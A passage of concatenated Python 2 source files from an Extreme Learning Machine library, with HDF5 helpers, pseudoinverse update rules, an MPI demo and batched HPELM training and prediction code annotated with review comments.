    if isinstance(X, basestring) and (X[-3:] == ".h5"):  # read partially from HDF5
        h5 = openFile(X)
        for node in h5.walk_nodes():
            pass  # find a node with whatever name
        N = node.shape[1]  # HDF5 files are transposed, for Matlab compatibility
        d = node.shape[0]
        nb = N/batch
        if N > nb*batch:
            nb += 1  # add last incomplete step
        E_x = np.zeros((d,), dtype=np.float64)
        E_x2 = np.zeros((d,), dtype=np.float64)
        idx_binary = range(d)  # indexes of binary features
        for b in xrange(nb):
            start = b*batch
            step = min(batch, N-start)
            X1 = node[:, start: start+step].astype(np.float).T
            E_x += np.mean(X1, 0) * (1.0*step/N)
            E_x2 += np.mean(X1**2, 0) * (1.0*step/N)
            # check which features are binary (only within every batch so far)
            b1 = []
            for idx in idx_binary:
                X1bin = X1[:, idx]
                if np.abs(X1bin).max() <= 1:
                    if np.allclose(X1bin, X1bin.astype(np.int)):
                        b1.append(idx)
            idx_binary = b1
        meanX = E_x
        E2_x = E_x**2
        # NOTE(review): E_x2 - E2_x can come out slightly negative from
        # floating-point rounding, giving nan under **0.5 -- confirm inputs
        stdX = (E_x2 - E2_x)**0.5
        h5.close()  # closing file
    else:  # load whole X into memory
        # load text file
        if isinstance(X, basestring):  # any other file - must be .txt (compressed) file
            if X[-3:] in ["txt", ".gz", "bz2"]:
                X = np.loadtxt(X, delimiter=delimiter)
            elif X[-3:] in ['npy']:
                X = np.load(X)
            else:
                raise IOError("Input file X should be text (*.txt), " +
                              "a compressed text (*.gz/*.bz2), an HDF5 file " +
                              "(*.h5), or Numpy binary (*.npy)")
        if not isinstance(X, np.ndarray):
            X = np.array(X)
        if len(X.shape) == 1:
            X = X.reshape(-1, 1)  # add second dimension
        idx_binary = []  # find binary features, where we skip normalization
        for idx in xrange(X.shape[1]):
            X1bin = X[:, idx]
            if np.abs(X1bin).max() <= 1:
                if np.allclose(X1bin, X1bin.astype(np.int)):
                    idx_binary.append(idx)
        meanX = X.mean(0)
        stdX = X.std(0)
        N = X.shape[0]
    # remove normalization of binary features
    for idx in idx_binary:
        meanX[idx] = 0
        stdX[idx] = 1
    # fix for constant input features, prevents division by zero
    stdX[stdX == 0] = 1
    return meanX, stdX
def c_dictT(T, batch=10000):
    """Creates dictionary of classes from any targets.

    Collects the set of unique 1-dim class labels from an HDF5 file
    (streamed in batches), a text/npy file, or an in-memory array, then
    maps each class to a one-hot row of the identity matrix.
    """
    if isinstance(T, basestring) and (T[-3:] == ".h5"):  # read partially from HDF5
        h5 = openFile(T)
        for node in h5.walk_nodes():
            pass  # find a node with whatever name
        assert node.shape[0] == 1, "Classification targets must have only one feature"
        N = node.shape[1]  # HDF5 files are transposed, for Matlab compatibility
        if batch > 0:
            nb = N/batch
            if N > nb*batch:
                nb += 1  # add last incomplete step
            c_set = set([])
            for b in xrange(nb):
                start = b*batch
                step = min(batch, N-start)
                T1 = node[:, start: start+step].ravel()
                c_set = c_set.union(set(T1))
        else:
            c_set = set(node[:].ravel())
        h5.close()  # closing file
    else:  # load whole T into memory
        # load text file
        if isinstance(T, basestring):  # any other file - must be .txt (compressed) file
            if T[-3:] in ["txt", ".gz", "bz2"]:
                with open(T) as f:
                    T = f.readlines()
            elif T[-3:] in ['npy']:
                T = np.load(T)
            else:
                raise IOError("Targets file T should be text (*.txt), " +
                              "a compressed text (*.gz/*.bz2), an HDF5 file " +
                              "(*.h5), or Numpy binary (*.npy)")
        if isinstance(T, np.ndarray):
            assert (len(T.shape) == 1) or (T.shape[1] == 1), "Classification targets must have only 1 feature"
            if len(T.shape) == 2:
                T = T.ravel()  # make targets 1-dimensional
        c_set = set(T)
    # one-hot code: class i -> row i of the C x C identity matrix
    classes = list(c_set)
    C = len(classes)
    temp = np.eye(C)
    C_dict = {classes[i]: temp[i] for i in xrange(C)}
    return C_dict
<file_sep>#include "magma.h"
void gpu_solve( magma_int_t n, magma_int_t nrhs, magmaDouble_ptr A, magmaDouble_ptr B, magmaDouble_ptr X );<file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Jan 6 19:05:03 2014
@author: akusoka1
"""
import numpy as np
import os
#from f_apply import f_apply
"""
n = 100000
k = 2000
H = np.ones((n,k))
f = np.random.randint(0,2,size=(k,)).astype(np.int32)
f_apply(H,f)
"""
'''
D_GE_TRI - inverse from triangular factorization
D_GE_LS - solve over- or under-determined linear system
D_GE_SVD - SVD of a matrix
'''
# Write test matrices for the C program (my_svd.c), run it, then compare
# three least-squares solutions: scipy's dgelss, the C result, numpy pinv.
H = np.random.randn(100,5)
Y = np.random.randn(100,2)
H.astype(np.float64).tofile("H.bin")
Y.astype(np.float64).tofile("Y.bin")
os.system("gcc my_svd.c -o mysvd -framework accelerate && ./mysvd")
from scipy.linalg.lapack import dgelss
v,x,s,rank,work,info = dgelss(H,Y)
#print v.shape, x.shape, s.shape, rank, work, info
W = x
# NOTE(review): my_svd.c writes only N*K = 10 doubles to W.bin, but this
# reshape expects 200 values (and its M/N sizes differ from the 100x5
# matrices written above) -- confirm which side is out of date
W2 = np.fromfile("W.bin", dtype=np.float64).reshape(100,2)
W3 = np.linalg.pinv(H).dot(Y)
print np.linalg.norm(H.dot(W[:5,:]) - Y)
print np.linalg.norm(H.dot(W2[:5,:]) - Y)
print np.linalg.norm(H.dot(W3) - Y)
print "done"
"""
XP = np.linalg.pinv(X)
U,s,V = np.linalg.svd(X, full_matrices=False)
print "U"
print U
print "s"
print s
print "V"
print V
print "done"
raise IOError
X2 = U.dot( (np.diag(s)).dot(V) )
XP2 = ( V.T.dot(np.diag(1/s)) ).dot(U.T)
V2 = np.fromfile("A.bin", dtype=np.float64).reshape(100,100).T * -1
print V2[:3,:3]
print V[:3,:3]
s.astype(np.float64).tofile("s.bin")
assert np.allclose(X, X2)
print "svd correct"
assert np.allclose(XP.dot(X), np.eye(100))
print "Pseudoinverse correct"
assert np.allclose(XP2.dot(X), np.eye(100))
print "Pseudoinverse via SVD correct"
"""
<file_sep># -*- coding: utf-8 -*-
"""
Created on Sun Nov 23 19:09:30 2014
@author: akusok
"""
import numpy as np
from numpy import linalg
np.set_printoptions(precision=5, suppress=True)
def run():
    """One random trial on a 2-class linear problem with a few flipped
    labels; returns (PRESS MSE, leave-one-out-weighted classification
    error, plain classification error)."""
    #Y = np.random.rand(30,2)
    N = 50
    Y = np.zeros((N,2))
    Y[:15,0] = 1
    Y[15:,1] = 1
    W = np.random.randn(2,5)
    Y2 = Y.copy()
    n = np.random.randint(1,9)
    for _ in range(n):
        k = np.random.randint(0,N)
        Y2[k] = -Y2[k]+1  # flip one random one-hot label
    X = Y2.dot(W) + np.random.randn(N,5)*0.1
    B = linalg.pinv(X).dot(Y)
    Yh = X.dot(B)
    err = np.mean((Y - Yh)**2)
    #print np.argmax(Y,1)
    #print np.argmax(Yh,1)
    #print "train", err
    # PRESS leave-one-out residuals: e_i = r_i / (1 - h_ii),
    # where h_ii = diag(X C X^T) are the hat-matrix diagonals
    N = X.shape[0]
    C = linalg.inv(np.dot(X.T, X))
    P = X.dot(C)
    W = C.dot(X.T).dot(Y)
    D = np.ones((N,)) - np.einsum('ij,ji->i', P, X.T)
    e = (Y - X.dot(W)) / D.reshape((-1,1))
    MSE = np.mean(e**2)
    #print 'press', MSE
    ###################################################
    ### best classification error here ###
    N = X.shape[0]
    C = linalg.inv(np.dot(X.T, X))
    P = X.dot(C)
    W = C.dot(X.T).dot(Y)
    D = np.ones((N,)) - np.einsum('ij,ji->i', P, X.T)
    e = (Y.argmax(1) - X.dot(W).argmax(1)) / D.T
    MCE = np.mean(e**2)
    #print 'class', MCE
    ###################################################
    # plain (unweighted) classification error for comparison
    e = Y.argmax(1) - X.dot(W).argmax(1)
    MCE2 = np.mean(e**2)
    #print 'clas2', MCE2
    return MSE, MCE, MCE2
def run_multiclass():
    """Same experiment as run() but with 3 independent (multi-label)
    targets; thresholding at 0.5 replaces argmax for classification."""
    #Y = np.random.rand(30,2)
    N = 20
    Y = np.random.rand(N,3)
    # NOTE(review): np.int is removed in NumPy >= 1.24
    Y = np.array(Y > 0.6, dtype=np.int)
    W = np.random.randn(3,5)
    Y2 = Y.copy()
    # flip a few random bits of the multi-label targets
    for _ in range(np.random.randint(1,5)):
        k = np.random.randint(0,N)
        for _ in range(np.random.randint(0,3)):
            j = np.random.randint(0,3)
            Y2[k,j] = -Y2[k,j]+1
    X = Y2.dot(W) + np.random.randn(N,5)*0.1
    # PRESS leave-one-out residuals (see run())
    N = X.shape[0]
    C = linalg.inv(np.dot(X.T, X))
    P = X.dot(C)
    W = C.dot(X.T).dot(Y)
    D = np.ones((N,)) - np.einsum('ij,ji->i', P, X.T)
    e = (Y - X.dot(W)) / D.reshape((-1,1))
    MSE = np.mean(e**2)
    #print 'press', MSE
    ###################################################
    ### best classification error here ###
    N = X.shape[0]
    C = linalg.inv(np.dot(X.T, X))
    P = X.dot(C)
    W = C.dot(X.T).dot(Y)
    D = np.ones((N,)) - np.einsum('ij,ji->i', P, X.T)
    e = ((Y>0.5) - (X.dot(W)>0.5)) / D.reshape((-1,1))
    MCE = np.mean(e**2)
    #print 'class', MCE
    ###################################################
    # plain (unweighted) multi-label classification error
    e = ((Y>0.5) - (X.dot(W)>0.5))
    MCE2 = np.mean(e**2)
    #print 'clas2', MCE2
    return MSE, MCE, MCE2
# Monte-Carlo comparison of PRESS MSE against the two classification-error
# variants over N random trials; prints percentages.
s = [0,0,0,0,0]
N = 10000
for _ in range(N):
    m,m2,m3 = run_multiclass()
    s[0] += m
    s[1] += np.abs(m2-m)
    s[2] += m2-m
    s[3] += np.abs(m3-m)
    s[4] += m3-m
s = np.array(s) * 100 / N
print "MSE, |MSE-MCE|, MSE-MCE, |MSE-MCE2|, MSE-MCE2"
print s
<file_sep># -*- coding: utf-8 -*-
"""
Created on Sat Nov 8 16:28:02 2014
@author: akusok
"""
import numpy as np
from tables import openFile, Atom
def h5write(filename, varname, data):
    """Writes one data matrix to HDF5 file.
    Similar to Matlab function.

    :param filename: output HDF5 file name
    :param varname: array node name (a leading "/" is stripped)
    :param data: Numpy array; 1-d input is reshaped to a column

    Fix: openFile() used to sit inside the try block whose `finally`
    called h5.close() -- if opening failed, the close raised NameError
    and masked the real error.  The file is now opened before the try.
    """
    assert isinstance(filename, basestring), "file name must be a string"
    assert isinstance(varname, basestring), "variable name must be a string"
    assert isinstance(data, np.ndarray), "data must be a Numpy array"
    if len(data.shape) == 1:
        data = data.reshape(-1,1)
    # remove leading "/" from variable name
    if varname[0] == "/":
        varname = varname[1:]
    h5 = openFile(filename, "w")
    try:
        a = Atom.from_dtype(data.dtype)
        h5.create_array(h5.root, varname, data.T, atom=a)  # transpose for Matlab compatibility
        h5.flush()
    finally:
        h5.close()
def h5read(filename):
    """Reads one data matrix from HDF5 file, variable name does not matter.
    Similar to Matlab function.
    """
    h5 = openFile(filename)
    # walk all nodes; the loop leaves `node` bound to the last one found
    for node in h5.walk_nodes():  # find the last node with whatever name
        pass
    M = node[:].T  # transpose for Matlab compatibility
    h5.close()
    return M
<file_sep># -*- coding: utf-8 -*-
"""
Greville and OPIUM method from:
<NAME> and <NAME>,
"Learning the Pseudoinverse Solution to Network Weights"
Neural Networks
Created on Sun Aug 5 10:05:29 2012
@author: andrevanschaik
"""
from numpy import dot, exp, eye, sqrt
def Greville(x, ee, M, P):
    """One step of Greville's recursive pseudoinverse update.

    Updates the weight matrix M and the inverse-correlation estimate P
    in place, given a new input column x and its prediction error ee.
    """
    psi = dot(P, x)
    gain = dot(psi, psi.T)
    nrm1 = 1 + dot(x.T, psi)
    P -= gain / nrm1
    M += dot(ee, psi.T) / nrm1
def OPIUM(x, ee, M, P, alpha):  # OPIUM modification to Greville
    """One OPIUM step: Greville's update with an error-magnitude-dependent
    regularization of P (van Schaik & Tapson, Neural Networks).

    Updates M and P in place; `alpha` scales the regularization.

    Fix: `eye(P.size ** 0.5)` passed a float to numpy.eye, which modern
    NumPy rejects; P is square, so use `eye(P.shape[0])`.  The repeated
    error term is also computed once.
    """
    psi = dot(P, x)
    nrm1 = 1 + dot(x.T, psi)
    # error-magnitude term in [0, 1): grows with the norm of ee
    reg = 1 - exp(-sqrt(dot(ee.T, ee)) / ee.size)
    nrm2 = 1 + alpha * reg
    P -= dot(psi, psi.T) / nrm1
    P += alpha * eye(P.shape[0]) * reg
    P /= nrm2
    M += dot(ee, psi.T) / nrm1
<file_sep># -*- coding: utf-8 -*-
"""
Created on Sun Oct 5 17:21:00 2014
@author: akusok
"""
import numpy as np
from mpi4py import MPI
def divide_X(X, size):
    """Split the rows of X into `size` nearly equal consecutive chunks.

    :param X: array sliceable along its first axis
    :param size: number of chunks (e.g. MPI world size)
    :returns: list of `size` row-slices of X; the last chunk(s) may be
              shorter (or empty) when len(X) is not divisible by size

    Fix: uses explicit floor division `//` -- identical on Python 2 ints,
    but plain `/` would produce a float slice bound under Python 3.
    """
    n = X.shape[0]
    if n % size == 0:
        batch = n // size
    else:
        batch = (n // size) + 1
    Xd = []
    for i in range(size):
        Xd.append(X[batch*i:batch*(i+1)])
    return Xd
# MPI demo: broadcast a projection matrix and transformation functions,
# scatter the input rows, compute partial H^T*H on every rank, and
# all-reduce the result; rank 0 verifies against the serial computation.
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
size = comm.Get_size()
if rank == 0:  # master node
    # distribute projection matrix
    W = np.random.rand(20,100)
    W = comm.bcast(W, root=0)
    print "%d W: "%rank, W.shape
    # distribute nonlinear transformation function
    F = []
    #F.extend([lambda x:x]*20)
    F.extend([np.tanh]*100)
    F = comm.bcast(F, root=0)
    # distribute input data
    X_input = np.random.randn(10000,20)
    Xd = divide_X(X_input, size)
    #del X_input
    X = comm.scatter(Xd, root=0)
    print "%d X: "%rank, X.shape
    # do computations
    Hp = X.dot(W).astype('d')
    # NOTE(review): H (the nonlinear outputs) is computed but never used
    H = np.empty(Hp.shape)
    for i in range(len(F)):
        H[:,i] = F[i](Hp[:,i])
    HpH = Hp.T.dot(Hp)
    # obtain joined result
    HH = np.empty(HpH.shape, dtype='d')
    comm.Allreduce([HpH, MPI.DOUBLE], [HH, MPI.DOUBLE], op=MPI.SUM)
    # check results
    H2 = X_input.dot(W)
    H2H = H2.T.dot(H2)
    print "results are the same: ", np.allclose(HH, H2H)
    print "%d done!" % rank
else:  # worker nodes
    # distribute projection matrix
    W = comm.bcast(None, root=0)
    print "%d W: "%rank, W.shape
    # distribute nonlinear transformation function
    F = comm.bcast(None, root=0)
    # distribute input data
    X = comm.scatter(None, root=0)
    print "%d X: "%rank, X.shape
    # do computations
    Hp = X.dot(W).astype('d')
    HpH = Hp.T.dot(Hp)
    # obtain joined result
    HH = np.empty(HpH.shape, dtype='d')
    comm.Allreduce([HpH, MPI.DOUBLE], [HH, MPI.DOUBLE], op=MPI.SUM)
    print "%d done!" % rank
<file_sep>'''
Created on Aug 18, 2014
@author: akusoka1
'''
from slfn import SLFN
from elm import ELM
from hp_elm import HPELM
from hpelm.modules.hdf5_tools import make_hdf5, normalize_hdf5
<file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Oct 27 17:48:33 2014
@author: akusok
"""
import numpy as np
def train_hpv(self, HH, HT, Xv, Tv, Yv):
    """Scratch draft of validation-set model structure selection (MYOPT).

    Selects the best number of ranked neurons by a 5-point interval-halving
    search over validation error, then prunes the model and re-solves.

    NOTE(review): this looks like unfinished scratch code — `Beta = self._`
    reads a `_` attribute and is immediately overwritten, and `X`, `T` are
    undefined in this scope (NameError at runtime). Appears superseded by
    the HPELM.train_hpv method elsewhere in this dump; confirm before use.
    """
    Beta = self._
    HH, HT, Beta = self._project(X, T, solve=True)
    Hv = self.project(Xv)
    nn = Hv.shape[1]
    e = np.ones((nn+1,)) * -1  # errors for all numbers of neurons
    rank, nn = self._ranking(nn, Xv, Tv)  # create ranking of neurons
    Yv = np.dot(Hv, Beta)
    err = self._error(Yv, Tv)
    penalty = err * 0.01 / nn  # penalty is 1% of error at max(nn)
    e[nn] = err + nn * penalty
    # MYOPT function
    # [A B C D E] interval points,
    # halve the interval each time
    # initialize intervals
    A = 1
    E = nn
    l = E - A
    B = A + l/4
    C = A + l/2
    D = A + 3*l/4
    l = 3  # run the while loop at least once
    while l > 2:
        # calculate errors at points
        for idx in [A, B, C, D, E]:
            if e[idx] == -1:  # skip already calculated errors
                rank1 = rank[:idx]
                HH1 = HH[rank1, :][:, rank1]
                HT1 = HT[rank1, :]
                Beta = self._solve_corr(HH1, HT1)
                Yv = np.dot(Hv[:, rank1], Beta)
                # penalize larger models so ties prefer fewer neurons
                e[idx] = self._error(Yv, Tv) + idx * penalty
        m = min(e[A], e[B], e[C], e[D], e[E])  # find minimum element
        # halve the search interval around the best point
        if m in (e[A], e[B]):
            E = C
            C = B
        elif m in (e[D], e[E]):
            A = C
            C = D
        else:
            A = B
            E = D
        l = E - A
        B = A + l/4
        D = A + (3*l)/4
    k_opt = [n1 for n1 in [A, B, C, D, E] if e[n1] == m][0]  # find minimum index
    best_nn = rank[:k_opt]
    self._prune(best_nn)
    self.Beta = self._project(X, T, solve=True)[2]
    print "%d of %d neurons selected with a validation set" % (len(best_nn), nn)
    if len(best_nn) > nn*0.9:
        print "Hint: try re-training with more hidden neurons"
<file_sep> # -*- coding: utf-8 -*-
"""
Created on Mon Oct 27 17:48:33 2014
@author: akusok
"""
import numpy as np
from numpy.linalg import lstsq
from modules.data_loader import batchX, batchT, meanstdX, c_dictT, decode
from modules.regularizations import semi_Tikhonov
from modules.error_functions import mse
from elm_abstract import ELM_abstract
class HPELM(ELM_abstract):
    """Extreme Learning Machine for Big Data.
    """
    # inherited def add_neurons(self, number, func, W=None, B=None):
    # inherited def save(self, model):
    # inherited def load(self, model):
    # inherited def _checkdata(self, X, T):

    def __init__(self, inputs, outputs, kind="", batch=10000):
        """Create ELM of desired kind.

        :param inputs: input dimensionality
        :param outputs: output dimensionality
        :param kind: model kind string, forwarded to the parent class
        :param batch: number of rows processed per data batch
        """
        super(HPELM, self).__init__(inputs, outputs, kind)
        self.batch = batch

    def project(self, X):
        # NOTE(review): intentionally a no-op here; projection happens
        # inline in train/predict/MSE below — confirm against the ABC.
        pass

    def train(self, X, T, delimiter=" "):
        """Trains ELM, can use any X and T(=Y), and specify neurons.
        Neurons: (number, type, [W], [B])
        """
        # get parameters of new data and add neurons
        self.Xmean, self.Xstd = meanstdX(X, self.batch, delimiter)
        if self.classification:
            self.C_dict = c_dictT(T, self.batch)
        # get data iterators (batched readers over files or arrays)
        genX, self.inputs, N = batchX(X, self.batch, delimiter)
        genT, self.targets = batchT(T, self.batch, delimiter, self.C_dict)
        # get mean value of targets
        if self.classification or self.multiclass:
            self.Tmean = np.zeros((self.targets,))  # for any classification
        else:
            self.Tmean, _ = meanstdX(T, self.batch, delimiter)
        # project data, accumulating the normal equations H'H and H'T
        nn = len(self.ufunc)
        HH = np.zeros((nn, nn))
        HT = np.zeros((nn, self.targets))
        # NOTE: loop variables X, T shadow the function arguments
        for X, T in zip(genX, genT):
            # get hidden layer outputs
            H = np.dot(X, self.W)
            for i in xrange(H.shape[1]):
                H[:, i] = self.ufunc[i](H[:, i])
            H, T = semi_Tikhonov(H, T, self.Tmean)  # add Tikhonov regularization
            # least squares solution - multiply both sides by H'
            # p weights each batch by its share of the total sample count
            p = float(X.shape[0]) / N
            HH += np.dot(H.T, H)*p
            HT += np.dot(H.T, T)*p
        # solve ELM model
        HH += self.cI * np.eye(nn)  # enhance solution stability
        self.B = lstsq(HH, HT)[0]
        #self.B = np.linalg.pinv(HH).dot(HT)

    def predict(self, X, delimiter=" "):
        """Get predictions using a trained or loaded ELM model.

        :param X: input data
        :rtype: predictions Th
        """
        assert self.B is not None, "train this model first"
        genX, inputs, _ = batchX(X, self.batch, delimiter)
        results = []
        for X in genX:
            assert self.inputs == inputs, "incorrect dimensionality of inputs"
            # project test inputs to outputs
            H = np.dot(X, self.W)
            for i in xrange(H.shape[1]):
                H[:, i] = self.ufunc[i](H[:, i])
            Th1 = H.dot(self.B)
            # additional processing for classification (labels, not scores)
            if self.classification:
                Th1 = decode(Th1, self.C_dict)
            results.append(Th1)
        # merge results
        if isinstance(results[0], np.ndarray):
            Th = np.vstack(results)
        else:
            Th = []  # merge results which are lists of items
            for r1 in results:
                Th.extend(r1)
        return Th

    def MSE(self, X, Y, delimiter=" "):
        """Mean Squared Error (or mis-classification error).

        Computed batch-wise; each batch's error is weighted by its share
        of the total number of samples.
        """
        MSE = 0
        genX, _, N = batchX(X, self.batch, delimiter)
        genT, _ = batchT(Y, self.batch, delimiter, self.C_dict)
        for X, T in zip(genX, genT):
            H = np.dot(X, self.W)
            for i in xrange(H.shape[1]):
                H[:, i] = self.ufunc[i](H[:, i])
            Th1 = H.dot(self.B)
            p = float(X.shape[0]) / N
            MSE += mse(T, Th1, self.classification, self.multiclass) * p
        return MSE
<file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Oct 27 17:48:33 2014
@author: akusok
"""
import numpy as np
import multiprocessing as mp
#import Queue
#import threading
from time import time
from hpelm.modules import make_hdf5, ireader, iwriter
from tables import open_file
from slfn import SLFN
class HPELM(SLFN):
    """Interface for training Extreme Learning Machines.
    """

    def _parse_args(self, args, kwargs, X, T):
        """Parse arguments of training, and prepare class variables.
        Model structure selection (exclusive, choose one)
        :param "V": use validation set
        :param "CV": use cross-validation
        Additional parameters for model structure selecation
        :param Xv: validation data X ("V")
        :param Tv: validation targets T ("V")
        :param k: number of splits ("CV")
        System setup
        :param "c": build ELM for classification
        :param "cb": build ELM with balanced classification
        :param "mc": build ELM for multiclass classification
        :param "adaptive"/"ad": build adaptive ELM for non-stationary model
        :param "batch": batch size for adaptive ELM (sliding window step size)
        """
        assert len(self.neurons) > 0, "Add neurons to ELM before training it"
        args = [a.upper() for a in args]  # make all arguments upper case
        # kind of "enumerators", try to use only inside that script
        MODELSELECTION = None  # V / CV / None
        ADAPTIVE = False  # batch / None
        # reset parameters
        self.ranking = None
        self.kmax_op = None
        self.classification = None  # c / wc / mc
        self.weights_wc = None  # weigths for weighted classification
        # check exclusive parameters
        assert len(set(args).intersection(set(["C", "WC", "MC"]))) <= 1, "Use only one of \
            C (classification) / MC (multiclass) / WC (weighted classification)"
        # parse parameters
        for a in args:
            if a == "C":
                assert self.targets > 1, "Classification targets must have 1 output per class"
                self.classification = "c"
            if a == "WC":
                assert self.targets > 1, "Classification targets must have 1 output per class"
                assert "w" in kwargs.keys(), "Provide class weights for weighted classification"
                w = kwargs['w']
                assert len(w) == T.shape[1], "Number of class weights differs from number of target classes"
                self.weights_wc = w
                self.classification = "wc"
            if a == "MC":
                self.classification = "mc"
        # if a in ("A", "AD", "ADAPTIVE"):
        #     assert "batch" in kwargs.keys(), "Provide batch size for adaptive ELM model (batch)"
        #     batch = kwargs['batch']
        #     ADAPTIVE = True

    def train(self, fX, fT, *args, **kwargs):
        """Universal training interface for ELM model with model structure selection.
        :param fX: input data HDF5 or matrix
        :param fT: target data HDF5 or matrix
        """
        X, T = self._checkdata(fX, fT)
        self._parse_args(args, kwargs, X, T)
        # traing the model: _project returns (HH, HT, Beta) when solve=True
        self.Beta = self._project(X, T, solve=True)[2]

    def train_async(self, fX, fT, *args, **kwargs):
        """Universal training interface for ELM model with model structure selection.
        Same as train() but with asynchronous HDF5 I/O in separate processes.
        :param fX: input data HDF5 or matrix
        :param fT: target data HDF5 or matrix
        """
        X, T = self._checkdata(fX, fT)
        self._parse_args(args, kwargs, X, T)
        # traing the model
        self.Beta = self._project_async(fX, fT, X, T, solve=True)[2]

    def _makeh5(self, h5name, N, d):
        """Creates HDF5 file opened in append mode.

        :return: the (single) data node of the newly created file
        """
        make_hdf5((N, d), h5name)
        h5 = open_file(h5name, "a")
        self.opened_hdf5.append(h5)
        for node in h5.walk_nodes():
            pass  # find a node with whatever name
        return node

    def predict(self, fX, fY):
        """Iterative predict which saves data to HDF5, sequential version.

        :param fX: input data HDF5 file
        :param fY: output HDF5 file to create and fill with predictions
        """
        assert self.Beta is not None, "Train ELM before predicting"
        X, _ = self._checkdata(fX, None)
        N = X.shape[0]
        make_hdf5((N, self.targets), fY)
        h5 = open_file(fY, "a")
        self.opened_hdf5.append(h5)
        for Y in h5.walk_nodes():
            pass  # find a node with whatever name
        nn = np.sum([n1[1] for n1 in self.neurons])
        batch = max(self.batch, nn)
        nb = N / batch  # number of batches
        if N > batch * nb:
            nb += 1
        t = time()
        t0 = time()
        eta = 0
        for b in xrange(0, nb):
            start = b*batch
            stop = min((b+1)*batch, N)
            # get data
            Xb = X[start:stop].astype(np.float64)
            # process data
            Hb = self.project(Xb)
            Yb = Hb.dot(self.Beta)
            # write data
            Y[start:stop] = Yb
            # report time: estimate remaining from average batch time
            eta = int(((time()-t0) / (b+1)) * (nb-b-1))
            if time() - t > self.tprint:
                print "processing batch %d/%d, eta %d:%02d:%02d" % (b+1, nb, eta/3600, (eta % 3600)/60, eta % 60)
                t = time()
        self.opened_hdf5.pop()
        h5.close()

    def predict_async(self, fX, fY):
        """Iterative predict which saves data to HDF5, with asynchronous I/O by separate processes.

        Uses a reader and a writer process with queues, prefetching the next
        batch while the current one is being computed.
        """
        assert self.Beta is not None, "Train ELM before predicting"
        X, _ = self._checkdata(fX, None)
        N = X.shape[0]
        # close the file opened by _checkdata; the reader process reopens it
        h5 = self.opened_hdf5.pop()
        h5.close()
        make_hdf5((N, self.targets), fY)
        # start async reader and writer for HDF5 files
        qr_in = mp.Queue()
        qr_out = mp.Queue(1)
        reader = mp.Process(target=ireader, args=(fX, qr_in, qr_out))
        reader.daemon = True
        reader.start()
        qw_in = mp.Queue(1)
        writer = mp.Process(target=iwriter, args=(fY, qw_in))
        writer.daemon = True
        writer.start()
        nn = np.sum([n1[1] for n1 in self.neurons])
        batch = max(self.batch, nn)
        nb = N / batch  # number of batches
        if N > batch * nb:
            nb += 1
        t = time()
        t0 = time()
        eta = 0
        # nb+1 iterations: the first only prefetches, the rest process
        # the previously fetched batch while the next one loads
        for b in xrange(0, nb+1):
            start_next = b*batch
            stop_next = min((b+1)*batch, N)
            # prefetch data
            qr_in.put((start_next, stop_next))  # asyncronous reading of next data batch
            if b > 0:  # first iteration only prefetches data
                # get data
                Xb = qr_out.get()
                Xb = Xb.astype(np.float64)
                # process data
                Hb = self.project(Xb)
                Yb = Hb.dot(self.Beta)
                # save data
                qw_in.put((Yb, start, stop))
            start = start_next
            stop = stop_next
            # report time
            eta = int(((time()-t0) / (b+1)) * (nb-b-1))
            if time() - t > self.tprint:
                print "processing batch %d/%d, eta %d:%02d:%02d" % (b+1, nb, eta/3600, (eta % 3600)/60, eta % 60)
                t = time()
        qw_in.put(None)  # sentinel: tells the writer to finish
        reader.join()
        writer.join()

    def _project(self, X, T, solve=False, wwc=None):
        """Create HH, HT matrices and computes solution Beta.
        HPELM-specific parallel projection.
        Returns solution Beta if solve=True.
        Runs on GPU if self.accelerator="GPU".
        Performs balanced classification if self.classification="cb".
        """
        # initialize
        nn = np.sum([n1[1] for n1 in self.neurons])
        batch = max(self.batch, nn)
        N = X.shape[0]
        nb = N / batch  # number of batches
        if N > batch * nb:
            nb += 1
        HH = np.zeros((nn, nn))  # init data holders
        HT = np.zeros((nn, self.targets))
        if self.classification == "wc":  # weighted classification initialization
            ns = np.zeros((self.targets,))
            for b in xrange(nb):  # batch sum is much faster
                ns += T[b*batch: (b+1)*batch].sum(axis=0)
            wc = (float(ns.sum()) / ns) * self.weights_wc  # class weights normalized to number of samples
            wc = wc**0.5  # because it gets applied twice
            if wwc is not None:
                wc = wwc
        if self.accelerator == "GPU":
            s = self.magma_solver.GPUSolver(nn, self.targets, self.alpha)
        else:
            HH.ravel()[::nn+1] += self.alpha  # add to matrix diagonal trick
        # main loop over all the data
        t = time()
        t0 = time()
        eta = 0
        for b in xrange(nb):
            eta = int(((time()-t0) / (b+0.0000001)) * (nb-b))
            if time() - t > self.tprint:
                print "processing batch %d/%d, eta %d:%02d:%02d" % (b+1, nb, eta/3600, (eta % 3600)/60, eta % 60)
                t = time()
            start = b*batch
            stop = min((b+1)*batch, N)
            Xb = X[start:stop].astype(np.float64)
            Tb = T[start:stop].astype(np.float64)
            Hb = self.project(Xb)
            if self.classification == "wc":  # apply per-sample weighting
                ci = Tb.argmax(1)
                Hb *= wc[ci, None]
                Tb *= wc[ci, None]
            if self.accelerator == "GPU":
                s.add_data(Hb, Tb)
            else:
                HH += np.dot(Hb.T, Hb)
                HT += np.dot(Hb.T, Tb)
        # get computed matrices back
        if self.accelerator == "GPU":
            HH, HT = s.get_corr()
            if solve:
                Beta = s.solve()
            s.finalize()
        elif solve:
            Beta = self._solve_corr(HH, HT)
        # return results
        if solve:
            return HH, HT, Beta
        else:
            return HH, HT

    def _project_async(self, fX, fT, X, T, solve=False, wwc=None):
        """Create HH, HT matrices and computes solution Beta, copy of _project but with async I/O.
        HPELM-specific parallel projection.
        Returns solution Beta if solve=True.
        Runs on GPU if self.accelerator="GPU".
        Performs balanced classification if self.classification="cb".
        """
        # initialize
        nn = np.sum([n1[1] for n1 in self.neurons])
        batch = max(self.batch, nn)
        N = X.shape[0]
        nb = N / batch  # number of batches
        if N > batch * nb:
            nb += 1
        HH = np.zeros((nn, nn))  # init data holders
        HT = np.zeros((nn, self.targets))
        if self.classification == "wc":  # weighted classification initialization
            ns = np.zeros((self.targets,))
            for b in xrange(nb):  # batch sum is much faster
                ns += T[b*batch: (b+1)*batch].sum(axis=0)
            wc = (float(ns.sum()) / ns) * self.weights_wc  # class weights normalized to number of samples
            wc = wc**0.5  # because it gets applied twice
            if wwc is not None:
                wc = wwc
        if self.accelerator == "GPU":
            s = self.magma_solver.GPUSolver(nn, self.targets, self.alpha)
        else:
